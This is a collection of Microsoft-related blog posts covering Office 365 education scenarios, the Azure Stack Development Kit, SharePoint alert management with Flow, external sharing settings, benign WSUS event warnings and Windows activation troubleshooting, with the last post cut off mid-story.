
Microsoft Office 365 in Education. Differentiated, Personalized and Adaptive Learning in Office 365

Author: Vitaly Vedenev (Виталий Веденев).

When the advantages of distance learning are discussed, scale is often among them. Here I look at how to organize mass-scale learning in Office 365.

What will you know and be able to do after reading this article?

- How to organize differentiated, personalized and adaptive learning in Office 365.

It is indeed hard to compare the throughput of a face-to-face course, even a lecture-hall one, with a massive online course that has practically no limits to scaling; the audience sizes differ by orders of magnitude. But this property is also a weakness of distance education: in face-to-face teaching the teacher can adjust the lessons to the learners, for example by running a survey at the start of the course, checking how well the material is understood during lessons, and talking to individual students personally if they have not grasped something or, conversely, want to go deeper into certain topics.

In a massive online course the teacher has no time for such interaction, and learners find themselves confined to a linearly structured course with no way to spend more time on hard assignments or skip easy ones.

Nevertheless, there are ways to achieve something similar in an automated (mass) mode. They fall into three main groups:

  1. Differentiated learning. The teacher creates several fixed learning paths of different difficulty levels in advance.
  2. Personalized learning. Here the learning path is built during the learning process depending on the learner's results in intermediate assessments.
  3. Adaptive learning. The most interesting group from an algorithmic standpoint. The path is also built during learning, but it needs no initial markup from the teacher; instead it uses as much information as possible about how the student studies the material and how others studied it before.

The rest of the article looks at concrete examples of implementing these three groups in Office 365.

Scenario 1. Example of organizing differentiated learning in Office 365

Differentiated learning can be organized with any of the known ways of building an information and educational environment (IEE) [1-3]; the choice of IEE depends on the preferences of the institution's teaching community.

The simplest way to adapt material to a learner's level: the teacher creates several fixed learning paths of different difficulty in advance, the learner picks the appropriate one and then studies it in the usual linear mode.

For example, this could be a series of Sway textbooks [4-5] or modules in OneDrive [6] for different levels of familiarity with the material; as the IEE we chose the Yammer private social network:

Notes on the diagram:

  1. The teacher first creates an electronic textbook in Sway [5] that includes the module's tests, videos, assignments and supplementary material. They then make the required number of copies of the textbook and, according to the level of instruction, add or remove learning material as needed. Finally, they copy the links to the textbooks for the different levels for use in a branching survey.
  2. The teacher creates a branching survey [7] that helps the learner determine their level and choose a Sway textbook.
  3. An explanation of the branching survey is posted in a group of the external private social network. Any member of the group can do this [3].

Scenario 2. Example of organizing personalized learning in Office 365

In personalized learning the path is built during the learning process depending on the learner's results, for example in intermediate tests. The teacher defines in advance the rules for when to test and what to recommend studying next for each outcome.

Personalized learning can be combined with group learning, but in both cases the teacher defines the learning path. Personalized learning can be implemented with a branching survey [7] that includes links to intermediate tests and moves on to the next block of material based on the test results. To do this the teacher has to design a more elaborate branching survey in Microsoft Forms (see scenario 1 [7] and the video "Creating branching surveys in Microsoft Forms").

Personalized learning can also be built on the teacher's ability to create personalized assignments in Microsoft Teams [8,9]. Using the personal section of the OneNote Online class notebook [9] extends the teacher's options for personalizing instruction.

Notes on the diagram:

  1. If Microsoft Teams [1] is chosen as the IEE, assignments can be created in the OneNote Online class notebook.
  2. The assignment should provide for testing the learner, based on Microsoft Forms, depending on their previous results.

Scenario 3. Example of organizing adaptive learning in Office 365

The individual path is again built during learning, but requires no initial markup from the teacher; instead it uses as much information as possible about how the learner studies the material and how others studied it before.

Adaptive learning in Office 365 can take the form of a recommender system (the Microsoft Teams chatbot capabilities [10] can be used) that advises the user which section of the material to study next, depending on their previous actions.

Having received the recommended material, the user can choose the next step:

- work through the material (solve the problems in it) and receive further recommendations as a result,

- mark the material as too easy and move on to harder material,

- mark the material as too hard and continue with the recommendations.

Sources:

  1. Microsoft Office 365 in Education. Building an information and educational environment with Microsoft Teams and SharePoint sites https://blogs.technet.microsoft.com/tasush/2018/01/11/postroenie-informacionno-obrazovatelnoj-sredy-sredstvami-microsoft-teams-i-sajtov-sharepoint/
  2. Microsoft Office 365 in Education. Building an information and educational environment with Microsoft Teams and Microsoft Stream streaming video https://blogs.technet.microsoft.com/tasush/2018/01/19/postroenie-informacionno-obrazovatelnoj-sredy-sredstvami-microsoft-teams-i-potokovogo-video-microsoft-stream/
  3. Microsoft Office 365 in Education. Building an information and educational environment with the Yammer private social network https://blogs.technet.microsoft.com/tasush/2018/02/22/postroenie-informacionno-obrazovatelnoj-sredy-sredstvami-chastnoj-socialnoj-seti-yammer/
  4. Microsoft Office 365 in Education. Curriculum content and Microsoft Sway https://vedenev.livejournal.com/19936.html
  5. Microsoft Office 365 in Education. Organizing learning with Microsoft Sway https://blogs.technet.microsoft.com/tasush/2017/02/28/organizuem-obuchenie-s-pomoshhju-microsoft-sway/
  6. Microsoft Office 365 in Education. Examples of implementing educational programs https://blogs.technet.microsoft.com/tasush/2017/06/16/primery-realizacii-obrazovatelnyh-programm/
  7. Microsoft Office 365 in Education. Creating educational branching surveys in Microsoft Forms https://blogs.technet.microsoft.com/tasush/2017/02/03/sozdanie-obuchajushhih-oprosov-s-vetvleniem-v-microsoft-forms/
  8. Microsoft Office 365 in Education. Organizing assignment-based learning in Microsoft Teams with the new features. Part 1 https://blogs.technet.microsoft.com/tasush/2017/12/13/organizacija-obuchenija-osnovannogo-na-zadanijah-v-microsoft-teams-s-novovvedenijami-1/
  9. Microsoft Office 365 in Education. Organizing assignment-based learning in Microsoft Teams with the new features. Part 2 https://blogs.technet.microsoft.com/tasush/2017/12/22/organizacija-obuchenija-osnovannogo-na-zadanijah-v-microsoft-teams-s-novovvedenijami-2/

Azure Stack – What, why, and, how?


You may well have heard that there is a way of running Microsoft's Azure public cloud service in your own datacenter. You may have paid it lip service and not believed such propaganda.

Well, folks, it is here, it works, and it gives you the opportunity to do much more with your own on-site hardware and to provide a number of Azure services to your own employees and customers.

This post is aimed at explaining what Azure Stack is, what it does and how you can go about learning how to use it.

What Azure Stack is

First the facts. Microsoft Azure Stack, according to the Azure Stack Operator Documentation is

"Microsoft Azure Stack is a hybrid cloud platform that lets you provide Azure services from your datacenter. "

As you probably know, Microsoft Azure now has over 50 regions made up of hundreds of datacenter buildings spread across the globe. There are millions of compute cores providing services as diverse as Traffic Manager, Content Delivery Networks, Machine Learning, HDInsight, SQL Data Warehouse and many more. There is no way that a normal or even a large datacenter can house all these services for you, and Azure Stack is not designed to do so. Azure Stack provides a growing subset of the Azure services for use in a hybrid (connected) or even a disconnected scenario.

Azure Stack is available now in two deployments. There is the Azure Stack licensed for use in production, provided as the Azure Stack Integrated System.

The integrated system is available through a small number of hardware partners (currently just four: Cisco, Dell EMC, HPE and Lenovo). This allows the hardware vendors to offer a combined system of hardware and software that gives you the flexibility and control you need over your system. The integrated system is available in configurations from 4 to 12 nodes. Support is provided jointly by the hardware partner and Microsoft. It is intended for the deployment of production workloads in a new and innovative manner.

Licensing the Azure Stack integrated system is dependent upon the method you use to deploy and can be varied in several ways from Pay as you go (just like Azure) to a consumption model for the disconnected scenario. A later post will cover these in detail.

The alternative to the integrated system is the Azure Stack Development Kit (ASDK). The ASDK can only be deployed on a single node and is intended to let you evaluate and learn about the platform and its services. It can be provided within your organization as a developer platform that is fully consistent with the Azure APIs and tooling. The ASDK is not licensed for production workloads, and for this reason it comes with the following limitations.

  • ASDK is associated with a single Azure Active Directory (Azure AD) or Active Directory Federation Services (AD FS) identity provider. You can create multiple users in this directory and assign subscriptions to each user.
  • With all components deployed on the single machine, there are limited physical resources available for tenant resources. This configuration is not intended for scale or performance evaluation.
  • Networking scenarios are limited due to the single host/NIC requirement.

Indeed to make sure it is of no practical use in production the ASDK will disable all except for one NIC on the host machine during install.

The host machine for the ASDK requires the following specification.

The many and complex PowerShell scripts used to install the ASDK check for all of these and will not allow installation unless you amend those script tests. To be brutally honest, doing so is counter-productive, since these hardware specs are definitely the minimum needed to run the ASDK effectively.

Deploying the ASDK

This is not a trivial undertaking! I have installed the ASDK several times (it only works for 180 days each time you install it). The exercise took me between 7 and 10 hours each time. It is, however, not a complex job (if you know PowerShell).

First you download the Development Kit package; you need to register first. Having downloaded and extracted the files, copy the cloudbuilder.vhdx file to the host machine.

Set the host to boot from this VHD and you are good to go. There is now a GUI installer as well as the PowerShell option. At this point you choose whether Azure AD or AD FS provides the identity solution for your deployment; I use Azure AD. Once you have run the InstallAzureStackPOC.ps1 PowerShell script and waited the requisite time, you will be left with a Hyper-V server joined to a domain, with the following virtual machines (VMs) forming the infrastructure of your Azure Stack Development Kit. The diagram below shows the logical architecture of the ASDK.

The VMs are listed in the table below with their function.

Notice there are VMs for Software Load-balancing and Network Controller, services which appear in Windows Server 2016 but originated as Azure services and are used to manage the full Azure public cloud.

Interesting note: any VMs you create in Azure Stack will appear in the Hyper-V host, as shown below.

Here you can see the infrastructure VMs alongside two additional VMs with long GUID names: one is a Windows Server VM with 28 GB RAM and the other is an Ubuntu VM (cos I love Linux too) with 56 GB RAM.

What Azure Stack does

Azure Stack provides a subset of Azure services. There are foundational services which are deployed when you deploy your ASDK; these are:

  • Compute
  • Storage
  • Networking
  • Key Vault

There are also additional Platform-as-a-Service (PaaS) services which can be configured and installed by an ASDK administrator:

  • App Service
  • Azure Functions
  • SQL and MySQL databases

Azure Stack will keep on adding services to this list. The Azure Stack Roadmap is here.

Learning How to use Azure Stack

Nowadays this section is always very short and very easy, even if the learning is not.

Pluralsight are offering free training for Azure Stack.

Microsoft Virtual Academy has some Azure Stack content

Channel9 has some great content here

Finally, the docs.microsoft.com site has all of the Azure Stack documentation.

BUT the very best way to learn is to dive in and understand the differences between Azure and Azure Stack operation by deploying it yourself. It can even be deployed on an Azure VM if you like!

The concept of an administrator portal doesn't really exist in Azure, but in Azure Stack you have both an admin portal and an operator portal, as shown below.

The administrator portal allows you to create your very own marketplace, as shown in the first graphic of the post. It also allows the administrator to create plans of resources to offer out to users, who can then create or accept subscriptions based on those offers.

Once a user has a subscription, they can deploy resources in exactly the same fashion and with the same methods as in Azure: the portal, PowerShell and Resource Manager templates.

You can see above the Ubuntu VM I showed in the Hyper-V Manager graphic.

I have to thank Lenovo UK for the loan of the hardware to deploy my ASDK, it is a Lenovo 9650 with 20 cores and 265GB RAM.

More in the next post on Azure Stack, dive in and enjoy.

 

Microsoft Flow | SharePoint Online Alerts | Delete Multiple user Out of the box Alerts


Scenario: SharePoint administrators would love to delete the user alerts subscribed to a list or library in one go. Unfortunately the user interface does not allow this; you have to do it one by one for every user, which is inefficient and very time-consuming.

In my previous blog, "Get list of Users Subscribed to OOB Alerts", you can see how to get all alerts, which is also not possible via the user interface.

In this blog I will show how to delete the alerts for a specific list; the task can be achieved in a few seconds.

Solution:
Below is the overall, uncollapsed version of the Flow. I will break it up further.

1. First we need to connect to the site, so an HTTP REST API call is used to get the alerts.

In the Compose data operation "Access Token", enter "@outputs('HTTP').body.access_token" (including the double quotes).

In the Compose data operation "Compose", enter "@outputs('HTTP_2').body.d.results" (including the double quotes).

2. I initialize a global variable and at the same time set its value to the "Compose" output, which is the body returned by the alerts REST API call in the "HTTP 2" step.

3. Next, add an 'Apply to each' over the array results; from each item we take only the 'List title' and the 'Alert ID', each stored in a Compose action:

   To get the list title: item()?['Title'] (enter without the quotes)
   To get the alert ID: item()?['ID'] (enter without the quotes)

4. Next we check for the specific list from which we want to delete all the OOB alerts. Add a Condition where 'Output of ListTitle' is equal to the list name.

5. Last step: alert deletion. If the condition is met, we run another HTTP REST API call with the "DELETE" method. The endpoint is /_api/web/alerts/deletealert('Alert ID'), so we replace 'Alert ID' with the output of the Compose action where the alert ID of the current item is stored. (Please note: the REST API method must be "DELETE".)

On a successful deletion, once the list title condition is met, the HTTP call for the DELETE method will look like the screenshot below.

Start your journey as a digital teacher right here

Digitally supported teaching engages pupils in entirely new ways.

It can help with differentiating instruction, to the benefit of both academically weaker and stronger pupils. At a very practical level it can help the teacher with day-to-day planning and the documentation of it. So why not start your journey towards a more digital classroom today?

We are ready to help you get started!

Together with some really cool teachers from across the country we have built a website that gathers everything about the modern classroom: an overview of the most used tools for digital teaching. And if you sign in while working through the materials, you can accumulate points towards your journey as a Microsoft Innovative Educator (MIE), which is good for the CV!

You will find free courses in Microsoft Office products such as OneNote, Sway and Teams, plus inspiration material on the following topics:

  • Media patrols for rolling out digital tools
  • Minecraft in mathematics teaching
  • Sway for attractive, easy pupil presentations (multimodality)
  • OneNote as the class's digital ring binder
  • Good advice for helping teachers get started with new tools
  • Tools for pupils with reading difficulties

Find it all at www.aka.ms/blivMIE and use the code ECQV6X9MCTAFY2018 when you sign up; then you are one step closer to becoming a Microsoft Innovative Educator!

(The site is easiest to access from a Mac/PC; on mobile, a login such as Facebook, an Office 365 work account or similar is required.)

Contact Erik Carter at Microsoft if you have questions: a-ercart@microsoft.com

FREE WORKSHOPS

If you live in Lyngby or the surrounding area on Zealand, we recommend signing up for one or more free afternoon workshops where Erik walks through each program's features for supporting learning, one program at a time.

See the workshop overview here

Microsoft Flow | SharePoint Online Alerts | Get list of users subscribed to out of the box SharePoint Alerts


Scenario: Get the list of users subscribed to out-of-the-box SharePoint Online alerts per site or subsite.

It has been a long-awaited requirement from SharePoint users and admins globally, and an ask to Microsoft, to provide a way to get a list of all users who have subscribed to alerts on lists, libraries or any object in a SharePoint site or subsite. After what feels like a lifetime, Microsoft released REST API methods for SharePoint alerts, and very recently I had to use them to get and delete user alerts via REST API calls for a project.

Today I will show how to get the list of all users subscribed to alerts for a site or subsite; the next blog will cover how to delete alerts for a specific list or library using the REST API method in Microsoft Flow.

Solution:

1. You need to get an access token for the SharePoint site. I have listed two very commonly browsed articles on this in this article. The same steps in my MS Flow look like the screenshot below.

2. Initialize the variable. The output generated from the REST API is an array, so we need to get only the results body from "/_api/web/alerts?$expand=user" and store it in a global array variable.

3. Now it gets a bit tricky. I am retrieving only "User Email", "User Display Name" (which comes as Title in the REST API results) and the "List Title" to which the alert is subscribed.

This is the uncollapsed screenshot; below I will break it up for better understanding.

Here, from the original array results of the HTTP REST API call, we store the values in variables.

In "Create HTML Table" I had kept "Include Headers" as "No", but there is a bug that I reported to Microsoft here.

The final step is sending an email to yourself with the output of the HTML table created.
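As an added example (not the author's Flow, which is built in the designer), the Python below reproduces the data handling of this post and of the companion "Delete Multiple user Out of the box Alerts" post against a constructed sample response: it parses body.d.results, builds the per-user report rows, and derives the deletealert('<Alert ID>') calls only for alerts on the list you name. The JSON shape, user fields and GUIDs are constructed assumptions; the authenticated HTTP calls themselves stay in the Flow.

```python
import json

# Constructed sample response (not captured from a real tenant). It follows the
# verbose OData shape the Flow reads: body.d.results is the array of alerts, and
# $expand=user inlines the subscribing user on each alert. The field mapping is
# the one the two posts use: Title = list title, ID = alert ID, User.Title =
# the user's display name, User.Email = the user's email.
SAMPLE_ALERTS_JSON = json.dumps({
    "d": {
        "results": [
            {"ID": "11111111-1111-1111-1111-111111111111", "Title": "Documents",
             "User": {"Email": "alice@contoso.example", "Title": "Alice Example"}},
            {"ID": "22222222-2222-2222-2222-222222222222", "Title": "Tasks",
             "User": {"Email": "bob@contoso.example", "Title": "Bob Example"}},
            {"ID": "33333333-3333-3333-3333-333333333333", "Title": "Documents",
             "User": {"Email": "bob@contoso.example", "Title": "Bob Example"}},
        ]
    }
})

# Endpoint the first post reads; relative to the site or subsite being audited.
ALERTS_ENDPOINT = "/_api/web/alerts?$expand=user"


def parse_alerts(body):
    """Equivalent of the Compose + 'Apply to each' steps: take body.d.results
    and keep only the four values the posts extract from each alert."""
    results = json.loads(body)["d"]["results"]
    return [
        {
            "list_title": item["Title"],           # item()?['Title']
            "alert_id": item["ID"],                # item()?['ID']
            "user_email": item["User"]["Email"],   # from $expand=user
            "user_name": item["User"]["Title"],    # display name comes as Title
        }
        for item in results
    ]


def users_subscribed(body):
    """Rows of the HTML table the first post emails: (email, name, list)."""
    return sorted((a["user_email"], a["user_name"], a["list_title"])
                  for a in parse_alerts(body))


def delete_requests_for_list(body, list_title):
    """Condition + DELETE step of the second post: for every alert on the named
    list, build the deletealert('<Alert ID>') endpoint that the Flow calls with
    the HTTP method DELETE. Alerts on other lists are left untouched."""
    return [
        f"/_api/web/alerts/deletealert('{a['alert_id']}')"
        for a in parse_alerts(body)
        if a["list_title"] == list_title
    ]


if __name__ == "__main__":
    for row in users_subscribed(SAMPLE_ALERTS_JSON):
        print("\t".join(row))
    for url in delete_requests_for_list(SAMPLE_ALERTS_JSON, "Documents"):
        print("DELETE", url)
```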

Warnings 640 and 636 are logged when uninstalling updates on Windows Server 2016

Hello everyone, this is the WSUS support team.

This post describes an issue on Windows Server 2016 where the following Windows Update Client errors are written to the event log when an update is removed (event 640 says that header-page validation of the flush map file DataStore.jfm failed with error -1919 and the file is being invalidated; event 636 says the file is deleted for reason ReadHdrFailed).

< Relevant event log entries >

ソース: ESENT
イベントID: 640
レベル: 警告
ユーザー: N/A
メッセージ:
wuaueng.dll (960) SUS20ClientDataStore: フラッシュ マップ ファイル "C:\Windows\SoftwareDistribution\DataStore\DataStore.jfm" でのヘッダー ページの検証中にエラー -1919 が発生しました。フラッシュ マップ ファイルは無効になります。
詳細については、[SignDbHdrFromDb:Create time:00/00/1900 00:00:00.000 Rand:0 Computer:] [SignFmHdrFromDb:Create time:00/00/1900 00:00:00.000 Rand:0 Computer:] [SignDbHdrFromFm:Create time:03/16/2018 14:57:54.165 Rand:2602757889 Computer:] [SignFmHdrFromFm:Create time:03/16/2018 14:57:54.212 Rand:1467011330 Computer:] を参照してください

ソース: ESENT
イベントID: 636
レベル: 警告
ユーザー: N/A
メッセージ:
wuaueng.dll (960) SUS20ClientDataStore: フラッシュ マップ ファイル "C:\Windows\SoftwareDistribution\DataStore\DataStore.jfm" は削除されます。理由: ReadHdrFailed。

In short, these records do not indicate a fault. The details follow.

Details of the behaviour

Whenever the Windows Update Client starts, it checks the version of the following database:

C:\Windows\SoftwareDistribution\DataStore\DataStore.edb

If the database version differs from the expected version, the database is always recreated, and the errors above are produced as a result of that recreation.
The implementation does not account for a version mismatch between the Windows Update Client and its database arising from system changes such as uninstalling an update, so the warning is logged; as long as it does not occur frequently, it can be treated as not a problem.

Remedy

Unfortunately no fix is available at present, but no impact is expected from these events being logged, and no action on your part is required.
If you monitor the event log, we kindly ask that you exclude these warning events.
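To tune monitoring the way the post recommends, here is an added Python example (not the WSUS support team's code) that suppresses exactly this ESENT 640/636 pattern from the Windows Update client's own datastore while still escalating other ESENT warnings and any burst of the pattern, since the post only calls these events harmless when they do not recur frequently. The event records, the English message text and the 24-hour/2-event threshold are constructed assumptions.

```python
from datetime import datetime, timedelta

# Constructed sample event records (not a real log). The fields mirror what the
# post shows: source, event ID, level, and a message whose first token names the
# logging module and the ESE instance (wuaueng.dll ... SUS20ClientDataStore).
WU_JFM = r"C:\Windows\SoftwareDistribution\DataStore\DataStore.jfm"
SAMPLE_EVENTS = [
    {"time": "2018-03-16T14:57:54", "source": "ESENT", "id": 640, "level": "Warning",
     "message": f"wuaueng.dll (960) SUS20ClientDataStore: header page validation of "
                f"flush map file \"{WU_JFM}\" failed with error -1919; the flush map "
                f"file will be invalidated."},
    {"time": "2018-03-16T14:57:54", "source": "ESENT", "id": 636, "level": "Warning",
     "message": f"wuaueng.dll (960) SUS20ClientDataStore: flush map file \"{WU_JFM}\" "
                f"will be deleted. Reason: ReadHdrFailed."},
    # Same event IDs from a different process and ESE instance: NOT the known pattern.
    {"time": "2018-03-16T15:02:10", "source": "ESENT", "id": 640, "level": "Warning",
     "message": "something.exe (123) OtherInstance: header page validation of flush "
                "map file failed with error -1919."},
]

BENIGN_IDS = {640, 636}
WU_INSTANCE = "SUS20ClientDataStore"


def is_known_benign(event):
    """True only for the exact pattern the post describes: ESENT 640/636 warnings
    raised by wuaueng.dll for the SUS20ClientDataStore instance."""
    return (event["source"] == "ESENT"
            and event["id"] in BENIGN_IDS
            and event["message"].startswith("wuaueng.dll")
            and WU_INSTANCE in event["message"])


def triage(events, window=timedelta(hours=24), max_per_window=2):
    """Split events into (suppressed, escalate).

    Events matching the benign pattern are suppressed, but the post treats them as
    harmless only when they are infrequent, so once more than max_per_window of
    them fall inside `window` the surplus is escalated. One datastore recreation
    produces one 640 and one 636, so the default allows one recreation per day.
    """
    suppressed, escalate = [], []
    recent = []  # timestamps of recently suppressed benign events
    for ev in sorted(events, key=lambda e: e["time"]):
        if not is_known_benign(ev):
            escalate.append(ev)
            continue
        t = datetime.fromisoformat(ev["time"])
        recent = [r for r in recent if t - r <= window]
        recent.append(t)
        if len(recent) > max_per_window:
            escalate.append(ev)
        else:
            suppressed.append(ev)
    return suppressed, escalate


if __name__ == "__main__":
    quiet, loud = triage(SAMPLE_EVENTS)
    print(f"suppressed {len(quiet)} known-benign event(s)")
    for ev in loud:
        print("ESCALATE", ev["source"], ev["id"], ev["message"][:60])
```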

 

General Availability of Azure Database for PostgreSQL and Azure Database for MySQL


General Availability of Azure Database for PostgreSQL

As announced on the 20th March, Azure Database for PostgreSQL and Azure Database for MySQL are generally available with an uptime SLA of 99.99 percent.

What does this mean?

These services bring the community versions of MySQL and PostgreSQL database engines together with:

  • Built-in high availability
  • Elastic scaling for performance
  • Industry leading security and compliance

Azure database services for MySQL and PostgreSQL enable flexibility for applications, from the choice of framework and language, to a rich ecosystem of tools and services - making it easier and quicker to build intelligent apps.

Check out the full details here.

General Availability of Azure Databricks

On the 22nd March, we also announced the general availability of Azure Databricks - a fast, easy, and collaborative Apache Spark based analytics platform optimised for Azure.

Designed in collaboration with the founders of Apache Spark, Azure Databricks combines the best of Databricks and Azure to help customers:

  • Accelerate innovation with one-click set up
  • Streamline workflows and an interactive workspace that enables collaboration between data scientists, data engineers, and business analysts.

As an Azure service, customers automatically benefit from native integration with other Azure services such as PowerBI, SQL Data Warehouse, Cosmos DB as well as from enterprise-grade Azure security, including Active Directory integration, compliance, and enterprise-grade SLAs.

Missed the official announcement? Catch up here.

Shifting Azure Stack information sharing from concept to usage patterns! Starting with the seminars in Osaka on 3/30 and Fukuoka on 4/17

In the months since Azure Stack went GA, we have run Azure Stack seminars with many partners.

Doing sessions two or three times a week felt like being an evangelist again, but my other main job did not get any smaller, so I am working hard at both.

In the seminars so far I have talked about how seriously Microsoft is committed to the Azure public cloud, and about how Azure Stack, by making the placement of Azure flexible rather than forcing you to overcome various requirements and constraints, lets you focus on what really matters.

I changed the content and tone to match each seminar's concept, but essentially I have repeated "What is Azure Stack?" over and over.

But now that I will be running Azure Stack seminars with IIJ and HPE, and having discussed the content with them, I felt it was time for a change.

Of course, there will still be plenty of opportunities to give overviews, and I have not tired of explaining the concept.

But now, with a new fiscal period in sight, I wanted to offer more than seminars for people who know nothing about it: information that helps those who say "I know roughly what Azure Stack is" take the next step.

In the limited time available, I plan to condense what I would normally cover in a two-to-three-hour session for a single company: Azure Stack IaaS and PaaS, the Azure Stack roadmap, Service Fabric and Container Service, and the IoT Edge and the Machine Learning running on Edge that tie into them.

First: Friday, March 30, Osaka
[Osaka] How to use it! Microsoft Azure Stack seminar, practical edition ~ Ways of using the cloud that HCI cannot solve

Next: Tuesday, April 17, Fukuoka
[Fukuoka] How to use it! Microsoft Azure Stack seminar, practical edition ~ Ways of using the cloud that HCI cannot solve ~

To be honest, I am still building the content, and the slide count keeps growing (laughs).

With Azure Stack, there is a mountain of things I want to tell you.

That is exactly why it is fun.

If the concept seminars were the first round, this seminar is the second, and there will probably need to be a third and a fourth.

But before the third, please come to this second-round seminar and take that first step.

And don't just listen to the sessions; during the breaks and before and after the seminar, throw any topic or question at me!

I think that is the real benefit of coming in person.

First up is this Friday, at Microsoft's Kansai branch office. I look forward to seeing you.

Microsoft, Takazoe


SharePoint Online External Sharing Demystified (Part 4): Allow sharing to authenticated external users and using anonymous access links


Hi this is the 4th of 4 blogs on SharePoint Online External Sharing of sites.

Here is a mini table of contents

The settings in the screenshot below are accessible by a Global Admin OR a SharePoint Admin (meaning someone who has been granted access to the SharePoint Admin center BY a Global Admin). The location is as follows: O365 Portal >> SharePoint admin >> Sharing

This is an External Sharing Matrix created by my colleague and fellow PFE Kevin Kirkpatrick. Check out his blog here.

In this blog we will be discussing the highlighted portion of the matrix below.

Once you choose an option other than 'Don't allow sharing outside your organization' you will receive the following screen as a reminder that SharePoint site collections also have individual sharing settings that you can set. These site collection settings RESPECT the settings of the SharePoint Admin Center. You would click OK to proceed, knowing that any site collections that previously had sharing enabled will be re-activated, since you are activating it at the SharePoint Admin Center level.

I make sure that the site collection sharing settings are also set to the same level of sharing, in this case 'Allow external users who accept sharing invitations and sign in as authenticated users' (see the previous blog for a thorough explanation of these settings).

The Site Owner is allowed to invite an external user. If the user is already in Azure AD then the site owner may see a result listed as below. If not, the user will not be found, but that is fine: proceed to send the invite anyway. We require the user to accept the sharing invite so that they are added to Azure AD if they are not already there. Then we add them to the O365 portal as well.

The external user will now get an invite in their email like this:

After clicking the link from the invite to the site, in this example the 'TeamSite' link, the external user is taken to this screen. They should choose 'Organizational Account'.

One small hurdle that may occur is that after clicking 'Organizational Account' the external user may receive a 'You need permission to access this site' message. They can then click the 'Request Access' link, which notifies the owner of the site to specifically approve this request.

The owner of the site can then approve the access request (Site collection >> Access requests and invitations) via the screen below. Once that is complete the external user will have access to the site.

SharePoint Online External Sharing Demystified (Part 3): Allow Users to Invite and Share with Authenticated External Users


Hi this is the 3rd of 4 blogs on SharePoint Online External Sharing of sites.

Here is a mini table of contents

The settings in the screenshot below are accessible by a Global Admin OR a SharePoint Admin (meaning someone who has been granted access to the SharePoint Admin center BY a Global Admin). The location is as follows: O365 Portal >> SharePoint admin >> Sharing

Once you choose an option other than 'Don't allow sharing outside your organization' you will receive the following screen as a reminder that SharePoint site collections also have individual sharing settings that you can set. These site collection settings RESPECT the settings of the SharePoint Admin Center. You would click OK to proceed, knowing that any site collections that previously had sharing enabled will be re-activated, since you are activating it at the SharePoint Admin Center level.

I make sure that the site collection sharing settings are also set to the same level of sharing, in this case 'Allow external users who accept sharing invitations and sign in as authenticated users' (see the previous blog for a thorough explanation of these settings).

The Site Owner is allowed to invite an external user. If the user is already in Azure AD then the site owner may see a result listed as below. If not, the user will not be found, but that is fine: proceed to send the invite anyway. We require the user to accept the sharing invite so that they are added to Azure AD if they are not already there. Then we add them to the O365 portal as well.

The external user will now get an invite in their email like this:

After clicking the link from the invite to the site, in this example the 'TeamSite' link, the external user is taken to this screen. They should choose 'Organizational Account'.

One small hurdle that may occur is that after clicking 'Organizational Account' the external user may receive a 'You need permission to access this site' message. They can then click the 'Request Access' link, which notifies the owner of the site to specifically approve this request.

The owner of the site can then approve the access request (Site collection >> Access requests and invitations) via the screen below. Once that is complete the external user will have access to the site.

 

Troubleshooting Active Directory Based Activation (ADBA) clients that do not activate


Hello everyone! My name is Mike Kammer, and I have been a Platforms PFE with Microsoft for just over two years now. I recently helped a customer with deploying Windows Server 2016 in their environment. We took this opportunity to also migrate their activation methodology from a KMS Server to Active Directory Based Activation.

As proper procedure for making all changes, we started our migration in the customer's test environment. We began our deployment by following the instructions in this excellent blog post by Charity Shelbourne. The domain controllers in our test environment were all running Windows Server 2012 R2, so we did not need to prep our forest. We installed the role on a Windows Server 2012 R2 Domain Controller and chose Active Directory Based Activation as our Volume Activation Method. We installed our KMS key and gave it a name of KMS AD Activation ( ** LAB). We pretty much followed the blog post step by step.

We started by building four virtual machines, two Windows 2016 Standard and two Windows 2016 Datacenter. At this point everything was great, and everyone was happy. We built a physical server running Windows 2016 Standard, and the machine activated properly. And that's where our story ends.

Ha Ha! Just kidding! Nothing is ever that easy. Truthfully, the set up and configuration were super easy, so that part was simple and straight forward. I came back into the office on Monday, and all the virtual machines I had built the week prior showed that they weren't activated. Hey! That's not right! I went back to the physical machine and it was fine. I went to the customer to discuss what had happened. Of course, the first question was "What changed over the weekend?" And as usual the answer was "nothing." This time, nothing really had been changed, and we had to figure out what was going on.

I went to one of my problem servers, opened a command prompt, and checked my output from the SLMGR /AO-LIST command. The AO-LIST switch displays all activation objects in Active Directory.



The results show that we have two Activation Objects: one for Server 2012 R2, and our newly created KMS AD Activation (** LAB), which is our Windows Server 2016 license. This confirms that Active Directory is correctly configured to activate Windows KMS clients.

Knowing that the SLMGR command is my friend for license activation, I continued with different options. I tried the /DLV switch, which will display detailed license information. This looked fine to me, I was running the Standard version of Windows Server 2016, there's an Activation ID, an Installation ID, a validation URL, even a partial Product Key.


Does anyone see what I missed at this point? We'll come back to it after my other troubleshooting steps but suffice it to say the answer is in this screenshot.

My thinking now is that for some reason the key is borked, so I use the /UPK switch, which uninstalls the current key. While this was effective in removing the key, it is generally not the best way to do it. Should the server get rebooted before getting a new key it may leave the server in a bad state. I found that using the /IPK switch (which I do later in my troubleshooting) overwrites the existing key and is a much safer route to take. Learn from my missteps!


I ran the /DLV switch again, to see the detailed license information. Unfortunately for me that didn't give me any helpful information, just a product key not found error. Because, of course, there's no key since I just uninstalled it!


I figured it was a longshot, but I tried the /ATO switch, which should activate Windows against the known KMS servers (or Active Directory as the case may be). Again, just a product not found error.


My next thought was that sometimes stopping and starting a service does the trick, so I tried that next. I need to stop and start the SPPSVC service, which is the Microsoft Software Protection Platform Service. From an administrative command prompt, I use the trusty NET STOP and NET START commands. I notice at first that the service isn't running, so I think this must be it!


But no. After starting the service and attempting to activate Windows again, I still get the product not found error.

I then looked at the Application Event Log on one of the trouble servers. I find an error related to License Activation, Event ID 8198, with a code of 0x8007007B.


While looking up this code, I found this article which says my error code means the file name, directory name, or volume label syntax is incorrect. Reading through the methods described in the article, it didn't seem that any of them fit my situation. When I ran the NSLOOKUP -type=all _vlmcs._tcp command, I found the existing KMS server (still lots of Windows 7 and Server 2008 machines in the environment, so it was necessary to keep it around), but also the five domain controllers as well. This indicated that it was not a DNS problem and my issues were elsewhere.


So I know DNS is fine. Active Directory is properly configured as a KMS activation source. My physical server has been activated properly. Could this be an issue with just VMs? As an interesting side note at this point, my customer informs me that someone in a different department has decided to build more than a dozen virtual Windows Server 2016 machines as well. So now I assume I've got another dozen servers to deal with that won't be activating. But no! Those servers activated just fine.

